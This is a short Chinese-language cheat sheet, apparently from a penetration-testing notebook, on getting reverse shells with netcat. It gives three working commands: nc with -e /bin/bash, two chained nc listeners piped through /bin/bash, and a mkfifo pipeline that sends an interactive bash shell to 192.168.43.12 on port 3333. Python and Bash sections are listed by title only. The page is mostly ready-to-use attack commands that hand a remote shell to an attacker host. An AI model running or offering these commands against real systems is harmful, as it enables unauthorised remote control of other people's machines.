Page cover

反弹Shell

nc工具(不同版本不同命令)

探测目标nc工具是否正常:nc {my_ip} 4444

┌──(kali㉿kali)-[~]
└─$ which nc
/usr/bin/nc

反弹shell:{ 方法一

nc -lnvp 4444
nc {your_ip} 4444 -e /bin/bash

方法二 nc串联

nc -lnvp 3333
nc -lnvp 4444
nc {your_ip} 3333 | /bin/bash | nc {your_ip} 4444

先跟用3333跟目标进行连接,连接后后续的指令都会通过管道,交给目标的/bin/bash进行解析,在让/bin/bash解析后的指令再次通过管道,再次通过4444 nc指令连接,并把指令发送给4444。

方法三 不含-e参数

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.43.12 3333 >/tmp/f

Python反弹shell

Bash反弹shell

最后更新于

这有帮助吗?